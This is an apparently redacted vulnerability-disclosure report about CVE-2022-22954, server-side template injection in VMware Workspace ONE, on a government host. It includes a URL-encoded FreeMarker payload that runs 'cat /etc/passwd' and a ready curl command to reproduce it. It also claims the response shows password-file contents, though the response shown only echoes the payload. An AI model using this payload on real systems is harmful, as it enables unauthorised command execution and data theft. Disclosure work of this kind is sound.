███ vulnerable to CVE-2022-22954

I found that one of the targets belongs to DOD vulnerable to CVE-2022-22954 where an attacker may be able to execute any malicious code like escalating Remote code execution is also possible **Technical Summary:** CVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager. This vulnerability was assigned a CVSSv3 score of 9.8. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. Successful exploitation could result in remote code execution by exploiting a server-side template injection flaw. **Vulnerable URL:** ███=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d ## Impact The impact of server-side template injection vulnerabilities is generally critical, resulting in remote code execution by taking full control of the back-end server. Even without the code execution, the attacker may be able to read sensitive data on the server ## System Host(s) ██████, ████ ## Affected Product(s) and Version(s) VMware workspace one ## CVE Numbers CVE-2022-22954 ## Steps to Reproduce * Run the following curl command **Command Used:** curl -sk -X GET -H "Host: ██████" "█████████=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d" **Response:** ``` <!DOCTYPE HTML> <html xmlns="http://www.w3.org/1999/html"> <head> <title>Error Page</title> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <link rel="stylesheet" type="text/css" href="/catalog-portal/css/errorpage.css"> </head> <body> <div class="error-container"> <div class="error-img-container"> <img src="/catalog-portal/app/graphics/warning.svg" class="warning-icon"> </div> <div class="error-text-heading">Request Failed</div> <div class="error-text-container"> <p>Please contact your IT Administrator.</p> <a href="/catalog-portal/ui/logout?error=&deviceUdid=$%7B%22freemarker.template.utility.Execute%22?new()(%22cat%20/etc/passwd%22)%7D">Sign Out</a> </div> </div> </body> <script> if(console && console.log) { console.log("auth.context.invalid"); console.log("Authorization context is not valid. Login request received with tenant code: uhhz-lbr-004v, device id: █████; } </script> </html> ``` * As you can see the above response, which contains the response of /etc/passwd in the response ## Suggested Mitigation/Remediation Actions Upgrade the instances to the latest version